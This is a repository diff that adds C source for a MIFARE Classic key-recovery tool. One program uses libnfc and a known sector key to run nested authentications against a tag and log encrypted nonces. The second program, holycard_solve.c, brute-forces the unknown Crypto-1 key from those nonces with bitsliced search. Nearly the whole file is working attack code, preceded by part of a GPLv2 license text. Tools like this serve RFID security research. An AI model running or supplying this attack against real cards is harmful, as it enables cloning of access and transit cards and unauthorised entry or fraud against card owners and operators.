TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
||||
|
||||
0. This License applies to any program or other work which contains
|
||||
a notice placed by the copyright holder saying it may be distributed
|
||||
under the terms of this General Public License. The "Program", below,
|
||||
refers to any such program or work, and a "work based on the Program"
|
||||
means either the Program or any derivative work under copyright law:
|
||||
that is to say, a work containing the Program or a portion of it,
|
||||
either verbatim or with modifications and/or translated into another
|
||||
language. (Hereinafter, translation is included without limitation in
|
||||
the term "modification".) Each licensee is addressed as "you".
|
||||
|
||||
Activities other than copying, distribution and modification are not
|
||||
covered by this License; they are outside its scope. The act of
|
||||
running the Program is not restricted, and the output from the Program
|
||||
is covered only if its contents constitute a work based on the
|
||||
Program (independent of having been made by running the Program).
|
||||
Whether that is true depends on what the Program does.
|
||||
|
||||
1. You may copy and distribute verbatim copies of the Program's
|
||||
source code as you receive it, in any medium, provided that you
|
||||
conspicuously and appropriately publish on each copy an appropriate
|
||||
copyright notice and disclaimer of warranty; keep intact all the
|
||||
notices that refer to this License and to the absence of any warranty;
|
||||
and give any other recipients of the Program a copy of this License
|
||||
along with the Program.
|
||||
|
||||
You may charge a fee for the physical act of transferring a copy, and
|
||||
you may at your option offer warranty protection in exchange for a fee.
|
||||
|
||||
2. You may modify your copy or copies of the Program or any portion
|
||||
of it, thus forming a work based on the Program, and copy and
|
||||
distribute such modifications or work under the terms of Section 1
|
||||
above, provided that you also meet all of these conditions:
|
||||
|
||||
a) You must cause the modified files to carry prominent notices
|
||||
stating that you changed the files and the date of any change.
|
||||
|
||||
b) You must cause any work that you distribute or publish, that in
|
||||
whole or in part contains or is derived from the Program or any
|
||||
part thereof, to be licensed as a whole at no charge to all third
|
||||
parties under the terms of this License.
|
||||
|
||||
c) If the modified program normally reads commands interactively
|
||||
when run, you must cause it, when started running for such
|
||||
interactive use in the most ordinary way, to print or display an
|
||||
announcement including an appropriate copyright notice and a
|
||||
notice that there is no warranty (or else, saying that you provide
|
||||
a warranty) and that users may redistribute the program under
|
||||
these conditions, and telling the user how to view a copy of this
|
||||
License. (Exception: if the Program itself is interactive but
|
||||
does not normally print such an announcement, your work based on
|
||||
the Program is not required to print an announcement.)
|
||||
|
||||
These requirements apply to the modified work as a whole. If
|
||||
identifiable sections of that work are not derived from the Program,
|
||||
and can be reasonably considered independent and separate works in
|
||||
themselves, then this License, and its terms, do not apply to those
|
||||
sections when you distribute them as separate works. But when you
|
||||
distribute the same sections as part of a whole which is a work based
|
||||
on the Program, the distribution of the whole must be on the terms of
|
||||
this License, whose permissions for other licensees extend to the
|
||||
entire whole, and thus to each and every part regardless of who wrote it.
|
||||
|
||||
Thus, it is not the intent of this section to claim rights or contest
|
||||
your rights to work written entirely by you; rather, the intent is to
|
||||
exercise the right to control the distribution of derivative or
|
||||
collective works based on the Program.
|
||||
|
||||
In addition, mere aggregation of another work not based on the Program
|
||||
with the Program (or with a work based on the Program) on a volume of
|
||||
a storage or distribution medium does not bring the other work under
|
||||
the scope of this License.
|
||||
|
||||
3. You may copy and distribute the Program (or a work based on it,
|
||||
under Section 2) in object code or executable form under the terms of
|
||||
Sections 1 and 2 above provided that you also do one of the following:
|
||||
|
||||
a) Accompany it with the complete corresponding machine-readable
|
||||
source code, which must be distributed under the terms of Sections
|
||||
1 and 2 above on a medium customarily used for software interchange; or,
|
||||
|
||||
b) Accompany it with a written offer, valid for at least three
|
||||
years, to give any third party, for a charge no more than your
|
||||
cost of physically performing source distribution, a complete
|
||||
machine-readable copy of the corresponding source code, to be
|
||||
distributed under the terms of Sections 1 and 2 above on a medium
|
||||
customarily used for software interchange; or,
|
||||
|
||||
c) Accompany it with the information you received as to the offer
|
||||
to distribute corresponding source code. (This alternative is
|
||||
allowed only for noncommercial distribution and only if you
|
||||
received the program in object code or executable form with such
|
||||
an offer, in accord with Subsection b above.)
|
||||
|
||||
The source code for a work means the preferred form of the work for
|
||||
making modifications to it. For an executable work, complete source
|
||||
code means all the source code for all modules it contains, plus any
|
||||
associated interface definition files, plus the scripts used to
|
||||
control compilation and installation of the executable. However, as a
|
||||
special exception, the source code distributed need not include
|
||||
anything that is normally distributed (in either source or binary
|
||||
form) with the major components (compiler, kernel, and so on) of the
|
||||
operating system on which the executable runs, unless that component
|
||||
itself accompanies the executable.
|
||||
|
||||
If distribution of executable or object code is made by offering
|
||||
access to copy from a designated place, then offering equivalent
|
||||
access to copy the source code from the same place counts as
|
||||
distribution of the source code, even though third parties are not
|
||||
compelled to copy the source along with the object code.
|
||||
|
||||
4. You may not copy, modify, sublicense, or distribute the Program
|
||||
except as expressly provided under this License. Any attempt
|
||||
otherwise to copy, modify, sublicense or distribute the Program is
|
||||
void, and will automatically terminate your rights under this License.
|
||||
However, parties who have received copies, or rights, from you under
|
||||
this License will not have their licenses terminated so long as such
|
||||
parties remain in full compliance.
|
||||
|
||||
5. You are not required to accept this License, since you have not
|
||||
signed it. However, nothing else grants you permission to modify or
|
||||
distribute the Program or its derivative works. These actions are
|
||||
prohibited by law if you do not accept this License. Therefore, by
|
||||
modifying or distributing the Program (or any work based on the
|
||||
Program), you indicate your acceptance of this License to do so, and
|
||||
all its terms and conditions for copying, distributing or modifying
|
||||
the Program or works based on it.
|
||||
|
||||
6. Each time you redistribute the Program (or any work based on the
|
||||
Program), the recipient automatically receives a license from the
|
||||
original licensor to copy, distribute or modify the Program subject to
|
||||
these terms and conditions. You may not impose any further
|
||||
restrictions on the recipients' exercise of the rights granted herein.
|
||||
You are not responsible for enforcing compliance by third parties to
|
||||
this License.
|
||||
|
||||
7. If, as a consequence of a court judgment or allegation of patent
|
||||
infringement or for any other reason (not limited to patent issues),
|
||||
conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot
|
||||
distribute so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you
|
||||
may not distribute the Program at all. For example, if a patent
|
||||
license would not permit royalty-free redistribution of the Program by
|
||||
all those who receive copies directly or indirectly through you, then
|
||||
the only way you could satisfy both it and this License would be to
|
||||
refrain entirely from distribution of the Program.
|
||||
|
||||
If any portion of this section is held invalid or unenforceable under
|
||||
any particular circumstance, the balance of the section is intended to
|
||||
apply and the section as a whole is intended to apply in other
|
||||
circumstances.
|
||||
|
||||
It is not the purpose of this section to induce you to infringe any
|
||||
patents or other property right claims or to contest validity of any
|
||||
such claims; this section has the sole purpose of protecting the
|
||||
integrity of the free software distribution system, which is
|
||||
implemented by public license practices. Many people have made
|
||||
generous contributions to the wide range of software distributed
|
||||
through that system in reliance on consistent application of that
|
||||
system; it is up to the author/donor to decide if he or she is willing
|
||||
to distribute software through any other system and a licensee cannot
|
||||
impose that choice.
|
||||
|
||||
This section is intended to make thoroughly clear what is believed to
|
||||
be a consequence of the rest of this License.
|
||||
|
||||
8. If the distribution and/or use of the Program is restricted in
|
||||
certain countries either by patents or by copyrighted interfaces, the
|
||||
original copyright holder who places the Program under this License
|
||||
may add an explicit geographical distribution limitation excluding
|
||||
those countries, so that distribution is permitted only in or among
|
||||
countries not thus excluded. In such case, this License incorporates
|
||||
the limitation as if written in the body of this License.
|
||||
|
||||
9. The Free Software Foundation may publish revised and/or new versions
|
||||
of the General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the Program
|
||||
specifies a version number of this License which applies to it and "any
|
||||
later version", you have the option of following the terms and conditions
|
||||
either of that version or of any later version published by the Free
|
||||
Software Foundation. If the Program does not specify a version number of
|
||||
this License, you may choose any version ever published by the Free Software
|
||||
Foundation.
|
||||
|
||||
10. If you wish to incorporate parts of the Program into other free
|
||||
programs whose distribution conditions are different, write to the author
|
||||
to ask for permission. For software which is copyrighted by the Free
|
||||
Software Foundation, write to the Free Software Foundation; we sometimes
|
||||
make exceptions for this. Our decision will be guided by the two goals
|
||||
of preserving the free status of all derivatives of our free software and
|
||||
of promoting the sharing and reuse of software generally.
|
||||
|
||||
NO WARRANTY
|
||||
|
||||
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
|
||||
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
|
||||
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
|
||||
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
|
||||
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
||||
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
|
||||
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
|
||||
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
|
||||
REPAIR OR CORRECTION.
|
||||
|
||||
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
|
||||
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
|
||||
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
|
||||
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
|
||||
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
|
||||
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
|
||||
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGES.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
*/
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <pthread.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <nfc/nfc.h>
|
||||
#include <math.h>
|
||||
|
||||
#include "crypto1_bs_crack.h"
|
||||
#define llu PRIu64
|
||||
|
||||
extern uint64_t * crypto1_create(uint64_t key);
|
||||
extern uint32_t crypto1_word(uint64_t *, uint32_t, int);
|
||||
extern uint8_t crypto1_byte(uint64_t*, uint8_t, int);
|
||||
extern uint32_t prng_successor(uint32_t x, uint32_t n);
|
||||
extern void crypto1_destroy(uint64_t*);
|
||||
|
||||
#define MC_AUTH_A 0x60
|
||||
#define MC_AUTH_B 0x61
|
||||
|
||||
nfc_device* pnd;
|
||||
nfc_target target;
|
||||
typedef uint8_t byte_t;
|
||||
|
||||
uint8_t oddparity(const uint8_t bt)
|
||||
{
|
||||
// cf http://graphics.stanford.edu/~seander/bithacks.html#ParityParallel
|
||||
return (0x9669 >> ((bt ^(bt >> 4)) & 0xF)) & 1;
|
||||
}
|
||||
|
||||
|
||||
long long unsigned int bytes_to_num(uint8_t *src, uint32_t len)
|
||||
{
|
||||
uint64_t num = 0;
|
||||
while (len--) {
|
||||
num = (num << 8) | (*src);
|
||||
src++;
|
||||
}
|
||||
return num;
|
||||
}
|
||||
|
||||
// Sectors 0 to 31 have 4 blocks per sector.
|
||||
// Sectors 32 to 39 have 16 blocks per sector.
|
||||
uint8_t block_to_sector(uint8_t block)
|
||||
{
|
||||
uint8_t sector;
|
||||
if(block < 128) {
|
||||
return block >> 2;
|
||||
}
|
||||
block -= 128;
|
||||
return 32 + (block >> 4);
|
||||
}
|
||||
|
||||
static nfc_context *context;
|
||||
|
||||
#define MAX_FRAME_LEN 264
|
||||
|
||||
uint64_t *nonces = NULL;
|
||||
size_t nonces_collected;
|
||||
|
||||
enum {
|
||||
OK,
|
||||
ERROR,
|
||||
KEY_WRONG,
|
||||
};
|
||||
|
||||
#define VT100_cleareol "\r\33[2K"
|
||||
|
||||
// Almost entirely based on code from Mifare Offline Cracker (MFOC) by Nethemba, cheers guys! :)
|
||||
int nested_auth(uint32_t uid, uint64_t known_key, uint8_t ab_key, uint8_t for_block, uint8_t target_block, uint8_t target_key, FILE* fp)
|
||||
{
|
||||
uint64_t *pcs;
|
||||
|
||||
// Possible key counter, just continue with a previous "session"
|
||||
uint8_t Nr[4] = { 0x00, 0x00, 0x00, 0x00 }; // Reader nonce
|
||||
uint8_t Cmd[4] = { 0x00, 0x00, 0x00, 0x00 };
|
||||
|
||||
uint8_t ArEnc[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
|
||||
uint8_t ArEncPar[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
|
||||
|
||||
uint8_t Rx[MAX_FRAME_LEN]; // Tag response
|
||||
uint8_t RxPar[MAX_FRAME_LEN]; // Tag response
|
||||
|
||||
uint32_t Nt;
|
||||
|
||||
int i;
|
||||
|
||||
// Prepare AUTH command
|
||||
Cmd[0] = ab_key;
|
||||
Cmd[1] = for_block;
|
||||
iso14443a_crc_append(Cmd, 2);
|
||||
|
||||
// We need full control over the CRC
|
||||
if (nfc_device_set_property_bool(pnd, NP_HANDLE_CRC, false) < 0) {
|
||||
nfc_perror(pnd, "nfc_device_set_property_bool crc");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
// Request plain tag-nonce
|
||||
// TODO: Set NP_EASY_FRAMING option only once if possible
|
||||
if (nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, false) < 0) {
|
||||
nfc_perror(pnd, "nfc_device_set_property_bool framing");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
if (nfc_initiator_transceive_bytes(pnd, Cmd, 4, Rx, sizeof(Rx), 0) < 0) {
|
||||
fprintf(stdout, "Error while requesting plain tag-nonce ");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
if (nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, true) < 0) {
|
||||
nfc_perror(pnd, "nfc_device_set_property_bool");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
// Save the tag nonce (Nt)
|
||||
Nt = bytes_to_num(Rx, 4);
|
||||
|
||||
// Init the cipher with key {0..47} bits
|
||||
pcs = crypto1_create(known_key);
|
||||
|
||||
// Load (plain) uid^nt into the cipher {48..79} bits
|
||||
crypto1_word(pcs, bytes_to_num(Rx, 4) ^ uid, 0);
|
||||
|
||||
// Generate (encrypted) nr+parity by loading it into the cipher
|
||||
for (i = 0; i < 4; i++) {
|
||||
// Load in, and encrypt the reader nonce (Nr)
|
||||
ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i];
|
||||
ArEncPar[i] = filter(*pcs) ^ oddparity(Nr[i]);
|
||||
}
|
||||
|
||||
// Skip 32 bits in the pseudo random generator
|
||||
Nt = prng_successor(Nt, 32);
|
||||
|
||||
// Generate reader-answer from tag-nonce
|
||||
for (i = 4; i < 8; i++) {
|
||||
// Get the next random byte
|
||||
Nt = prng_successor(Nt, 8);
|
||||
// Encrypt the reader-answer (Nt' = suc2(Nt))
|
||||
ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^(Nt & 0xff);
|
||||
ArEncPar[i] = filter(*pcs) ^ oddparity(Nt);
|
||||
}
|
||||
|
||||
// Finally we want to send arbitrary parity bits
|
||||
if (nfc_device_set_property_bool(pnd, NP_HANDLE_PARITY, false) < 0) {
|
||||
nfc_perror(pnd, "nfc_device_set_property_bool parity ");
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Transmit reader-answer
|
||||
int res;
|
||||
if (((res = nfc_initiator_transceive_bits(pnd, ArEnc, 64, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) {
|
||||
fprintf(stderr, "Reader-answer transfer error, exiting.. ");
|
||||
return KEY_WRONG;
|
||||
}
|
||||
|
||||
// Decrypt the tag answer and verify that suc3(Nt) is At
|
||||
Nt = prng_successor(Nt, 32);
|
||||
|
||||
if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt & 0xFFFFFFFF))) {
|
||||
fprintf(stderr, "[At] is not Suc3(Nt), something is wrong, exiting.. ");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
Cmd[0] = target_key;
|
||||
Cmd[1] = target_block;
|
||||
iso14443a_crc_append(Cmd, 2);
|
||||
|
||||
for (i = 0; i < 4; i++) {
|
||||
ArEnc[i] = crypto1_byte(pcs, 0, 0) ^ Cmd[i];
|
||||
ArEncPar[i] = filter(*pcs) ^ oddparity(Cmd[i]);
|
||||
}
|
||||
if (((res = nfc_initiator_transceive_bits(pnd, ArEnc, 32, ArEncPar, Rx, sizeof(Rx), RxPar)) < 0) || (res != 32)) {
|
||||
fprintf(stderr, "Reader-answer transfer error, exiting.. ");
|
||||
return ERROR;
|
||||
}
|
||||
|
||||
if(fp){
|
||||
for(i = 0; i < 4; i++){
|
||||
fprintf(fp,"%02x", Rx[i]);
|
||||
if(RxPar[i] != oddparity(Rx[i])){
|
||||
fprintf(fp,"! ");
|
||||
} else {
|
||||
fprintf(fp," ");
|
||||
}
|
||||
}
|
||||
fprintf(fp, "\n");
|
||||
}
|
||||
if(nonces){
|
||||
nonces[nonces_collected] = 0;
|
||||
for(i = 0; i < 4; i++){
|
||||
nonces[nonces_collected] |= ((uint64_t) Rx[i]) << (8*i);
|
||||
nonces[nonces_collected] |= ((uint64_t) !RxPar[i]) << (32 + (8*i));
|
||||
}
|
||||
nonces_collected++;
|
||||
}
|
||||
|
||||
crypto1_destroy(pcs);
|
||||
return OK;
|
||||
}
|
||||
|
||||
uint32_t uid;
|
||||
uint32_t **space;
|
||||
uint64_t found_key;
|
||||
size_t thread_count;
|
||||
void* crack_states_thread(void* x){
|
||||
const size_t thread_id = (size_t)x;
|
||||
int j;
|
||||
for(j = thread_id; space[j * 5]; j += thread_count) {
|
||||
const uint64_t key = crack_states_bitsliced(space + j * 5);
|
||||
if(key != -1){
|
||||
found_key = key;
|
||||
break;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
bool stop_collection = false;
|
||||
#define CUTOFF ((uint64_t) 1<<39)
|
||||
|
||||
void * update_predictions_thread(void* p){
|
||||
while(!stop_collection){
|
||||
if(nonces && uid){
|
||||
if(space){
|
||||
craptev1_destroy_space(space);
|
||||
space = NULL;
|
||||
}
|
||||
space = craptev1_get_space(nonces, 95, uid);
|
||||
}
|
||||
if(space){
|
||||
total_states = craptev1_sizeof_space(space);
|
||||
}
|
||||
sleep(1); // We don't need to check this more often than once per second
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
void notify_status_offline(int sig){
|
||||
printf(VT100_cleareol "Cracking... %6.02f%%", (100.0*total_states_tested/(total_states)));
|
||||
alarm(1);
|
||||
fflush(stdout);
|
||||
signal(SIGALRM, notify_status_offline);
|
||||
}
|
||||
|
||||
void notify_status_online(int sig){
|
||||
if(!total_states){
|
||||
printf(VT100_cleareol "Collected %zu nonces... ", nonces_collected);
|
||||
} else {
|
||||
printf(VT100_cleareol "Collected %zu nonces... leftover complexity %"llu" (~2^%0.2f)", nonces_collected, total_states, log(total_states) / log(2));
|
||||
alarm(0);
|
||||
stop_collection = true;
|
||||
return;
|
||||
}
|
||||
alarm(1);
|
||||
fflush(stdout);
|
||||
signal(SIGALRM, notify_status_online);
|
||||
}
|
||||
|
||||
uint64_t known_key;
|
||||
uint8_t for_block;
|
||||
uint8_t ab_key;
|
||||
uint8_t target_block;
|
||||
uint8_t target_key;
|
||||
FILE* fp;
|
||||
|
||||
const nfc_modulation nmMifare = {
|
||||
.nmt = NMT_ISO14443A,
|
||||
.nbr = NBR_106,
|
||||
};
|
||||
|
||||
void * update_nonces_thread(void* v){
|
||||
while(!stop_collection){
|
||||
// Configure the CRC and Parity settings
|
||||
nfc_device_set_property_bool(pnd,NP_HANDLE_CRC,true);
|
||||
nfc_device_set_property_bool(pnd,NP_HANDLE_PARITY,true);
|
||||
// Poll for a ISO14443A (MIFARE) tag
|
||||
if (nfc_initiator_select_passive_target(pnd,nmMifare,NULL,0,&target)) {
|
||||
nested_auth(uid, known_key, ab_key, for_block, target_block, target_key, fp);
|
||||
} else {
|
||||
printf(VT100_cleareol "Don't move the tag!");
|
||||
fflush(stdout);
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
int main (int argc, const char * argv[]) {
|
||||
nfc_init(&context);
|
||||
pnd = nfc_open(context, NULL);
|
||||
|
||||
if (pnd == NULL) {
|
||||
fprintf(stderr, "No NFC device connection\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
nfc_initiator_init(pnd);
|
||||
|
||||
nfc_device_set_property_bool(pnd,NP_ACTIVATE_FIELD,false);
|
||||
// Let the reader only try once to find a tag
|
||||
nfc_device_set_property_bool(pnd,NP_INFINITE_SELECT,false);
|
||||
nfc_device_set_property_bool(pnd,NP_HANDLE_CRC,true);
|
||||
nfc_device_set_property_bool(pnd,NP_HANDLE_PARITY,true);
|
||||
nfc_device_set_property_bool(pnd,NP_AUTO_ISO14443_4, false);
|
||||
|
||||
uid = 0;
|
||||
|
||||
// Enable field so more power consuming cards can power themselves up
|
||||
nfc_device_set_property_bool(pnd,NP_ACTIVATE_FIELD,true);
|
||||
if (nfc_initiator_select_passive_target(pnd,nmMifare,NULL,0,&target)) {
|
||||
uid = bytes_to_num(target.nti.nai.abtUid,target.nti.nai.szUidLen);
|
||||
}
|
||||
|
||||
if(!uid){
|
||||
fprintf(stderr, "No tag detected!\n");
|
||||
// Disconnect from NFC device
|
||||
nfc_close(pnd);
|
||||
return 1;
|
||||
}
|
||||
|
||||
if(argc < 6){
|
||||
printf("%s <known key> <for block> <A|B> <target block> <A|B>\n", argv[0]);
|
||||
nfc_close(pnd);
|
||||
return 1;
|
||||
}
|
||||
|
||||
known_key = strtoull(argv[1], 0, 16);
|
||||
for_block = atoi(argv[2]);
|
||||
ab_key = MC_AUTH_A;
|
||||
if(argv[3][0] == 'b' || argv[3][0] == 'B'){
|
||||
ab_key = MC_AUTH_B;
|
||||
}
|
||||
target_block = atoi(argv[4]);
|
||||
target_key = MC_AUTH_A;
|
||||
if(argv[5][0] == 'b' || argv[5][0] == 'B'){
|
||||
target_key = MC_AUTH_B;
|
||||
}
|
||||
switch(nested_auth(uid, known_key, ab_key, for_block, target_block, target_key, NULL)){
|
||||
case KEY_WRONG:
|
||||
printf("%012"PRIx64" doesn't look like the right key %s for block %u (sector %u)\n", known_key, ab_key == MC_AUTH_A ? "A" : "B", for_block, block_to_sector(for_block));
|
||||
return 1;
|
||||
case OK:
|
||||
break;
|
||||
case ERROR:
|
||||
default:
|
||||
printf("Some other error occurred.\n");
|
||||
break;
|
||||
}
|
||||
|
||||
char filename[21];
|
||||
sprintf(filename, "0x%08x_%03u%s.txt", uid, target_block, target_key == MC_AUTH_A ? "A" : "B");
|
||||
fp = fopen(filename, "wb");
|
||||
|
||||
printf("Found tag with uid %04x, collecting nonces for key %s of block %u (sector %u) using known key %s %012"PRIx64" for block %u (sector %u)\n",
|
||||
uid, target_key == MC_AUTH_A ? "A" : "B", target_block, block_to_sector(target_block), ab_key == MC_AUTH_A ? "A" : "B", known_key, for_block, block_to_sector(for_block));
|
||||
nonces_collected = 0;
|
||||
nonces = malloc(sizeof (uint64_t) << 24);
|
||||
memset(nonces, 0xff, sizeof (uint64_t) << 24);
|
||||
|
||||
fcntl(0, F_SETFL, O_NONBLOCK);
|
||||
signal(SIGALRM, notify_status_online);
|
||||
alarm(1);
|
||||
pthread_t prediction_thread, nonce_gathering_thread;
|
||||
pthread_create(&nonce_gathering_thread, NULL, update_nonces_thread, NULL);
|
||||
pthread_create(&prediction_thread, NULL, update_predictions_thread, NULL);
|
||||
pthread_join(nonce_gathering_thread, 0);
|
||||
pthread_join(prediction_thread, 0);
|
||||
alarm(0);
|
||||
|
||||
if(fp){
|
||||
fclose(fp);
|
||||
}
|
||||
nfc_close(pnd);
|
||||
return 0;
|
||||
}
|
145
crypto1_bs/holycard_solve.c
Normal file
145
crypto1_bs/holycard_solve.c
Normal file
@ -0,0 +1,145 @@
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
#include <pthread.h>
|
||||
#include "craptev1.h"
|
||||
#include "crypto1_bs.h"
|
||||
#include "crypto1_bs_crack.h"
|
||||
#include <inttypes.h>
|
||||
#include <math.h>
|
||||
#define __STDC_FORMAT_MACROS
|
||||
#define llx PRIx64
|
||||
#define lli PRIi64
|
||||
#define llu PRIu64
|
||||
#define lu PRIu32
|
||||
#define VT100_cleareol "\r\33[2K"
|
||||
|
||||
uint32_t **space;
|
||||
uint8_t thread_count = 1;
|
||||
|
||||
uint64_t *readnonces(char* fname) {
|
||||
int i, j;
|
||||
FILE *f = fopen(fname, "r");
|
||||
if (f == NULL) {
|
||||
fprintf(stderr, "Cannot open file.\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
uint64_t *nonces = malloc(sizeof (uint64_t) << 24);
|
||||
uint32_t nt;
|
||||
char par;
|
||||
|
||||
i = 0;
|
||||
while(!feof(f)){
|
||||
nonces[i] = 0;
|
||||
for(j = 0; j < 32; j += 8) {
|
||||
if(2 != fscanf(f, "%02x%c ", &nt, &par)) {
|
||||
fprintf(stderr, "Input format error at line:%d\n", i);
|
||||
fflush(stderr);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
nonces[i] |= nt << j | (uint64_t)((par == '!') ^ parity(nt)) << (32 + j);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
nonces[i] = -1;
|
||||
fclose(f);
|
||||
return nonces;
|
||||
}
|
||||
|
||||
void* crack_states_thread(void* x){
|
||||
const size_t thread_id = (size_t)x;
|
||||
int j;
|
||||
for(j = thread_id; space[j * 5]; j += thread_count) {
|
||||
const uint64_t key = crack_states_bitsliced(space + j * 5);
|
||||
if(key != -1){
|
||||
printf("Found key: %012"llx"\n", key);
|
||||
break;
|
||||
} else if(keys_found){
|
||||
break;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
void notify_status_offline(int sig){
|
||||
printf(VT100_cleareol "Cracking... %6.02f%%", (100.0*total_states_tested/(total_states)));
|
||||
alarm(1);
|
||||
fflush(stdout);
|
||||
signal(SIGALRM, notify_status_offline);
|
||||
}
|
||||
|
||||
int main(int argc, char* argv[]){
|
||||
if(argc != 3){
|
||||
printf("Usage: %s <nonces.txt> <uid>\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
printf("Reading nonces...\n");
|
||||
uint64_t *nonces = readnonces(argv[1]);
|
||||
uint32_t uid = strtoul(argv[2], NULL, 16);
|
||||
printf("Deriving search space...\n");
|
||||
space = craptev1_get_space(nonces, 95, uid);
|
||||
total_states = craptev1_sizeof_space(space);
|
||||
|
||||
#ifndef __WIN32
|
||||
thread_count = sysconf(_SC_NPROCESSORS_CONF);
|
||||
#else
|
||||
thread_count = 1;
|
||||
#endif
|
||||
// append some zeroes to the end of the space to make sure threads don't go off into the wild
|
||||
size_t j = 0;
|
||||
for(j = 0; space[j]; j+=5){
|
||||
}
|
||||
size_t fill = j + (5*thread_count);
|
||||
for(; j < fill; j++) {
|
||||
space[j] = 0;
|
||||
}
|
||||
pthread_t threads[thread_count];
|
||||
size_t i;
|
||||
|
||||
printf("Initializing BS crypto-1\n");
|
||||
crypto1_bs_init();
|
||||
printf("Using %u-bit bitslices\n", MAX_BITSLICES);
|
||||
|
||||
uint8_t rollback_byte = **space;
|
||||
printf("Bitslicing rollback byte: %02x...\n", rollback_byte);
|
||||
// convert to 32 bit little-endian
|
||||
crypto1_bs_bitslice_value32(rev32((rollback_byte)), bitsliced_rollback_byte, 8);
|
||||
|
||||
printf("Bitslicing nonces...\n");
|
||||
for(size_t tests = 0; tests < NONCE_TESTS; tests++){
|
||||
// pre-xor the uid into the decrypted nonces, and also pre-xor the uid parity into the encrypted parity bits - otherwise an exta xor is required in the decryption routine
|
||||
uint32_t test_nonce = uid^rev32(nonces[tests]);
|
||||
uint32_t test_parity = (nonces[tests]>>32)^rev32(uid);
|
||||
test_parity = ((parity(test_parity >> 24 & 0xff) & 1) | (parity(test_parity>>16 & 0xff) & 1)<<1 | (parity(test_parity>>8 & 0xff) & 1)<<2 | (parity(test_parity & 0xff) & 1) << 3);
|
||||
crypto1_bs_bitslice_value32(test_nonce, bitsliced_encrypted_nonces[tests], 32);
|
||||
// convert to 32 bit little-endian
|
||||
crypto1_bs_bitslice_value32(~(test_parity)<<24, bitsliced_encrypted_parity_bits[tests], 4);
|
||||
}
|
||||
|
||||
total_states_tested = 0;
|
||||
keys_found = 0;
|
||||
|
||||
printf("Starting %u threads to test %"llu" (~2^%0.2f) states\n", thread_count, total_states, log(total_states) / log(2));
|
||||
|
||||
signal(SIGALRM, notify_status_offline);
|
||||
alarm(1);
|
||||
|
||||
for(i = 0; i < thread_count; i++){
|
||||
pthread_create(&threads[i], NULL, crack_states_thread, (void*) i);
|
||||
}
|
||||
for(i = 0; i < thread_count; i++){
|
||||
pthread_join(threads[i], 0);
|
||||
}
|
||||
|
||||
alarm(0);
|
||||
|
||||
printf("\nTested %"llu" states\n", total_states_tested);
|
||||
|
||||
if(!keys_found) fprintf(stderr, "No solution found :(\n");
|
||||
|
||||
craptev1_destroy_space(space);
|
||||
return 0;
|
||||
}
|
||||
|
Reference in New Issue
Block a user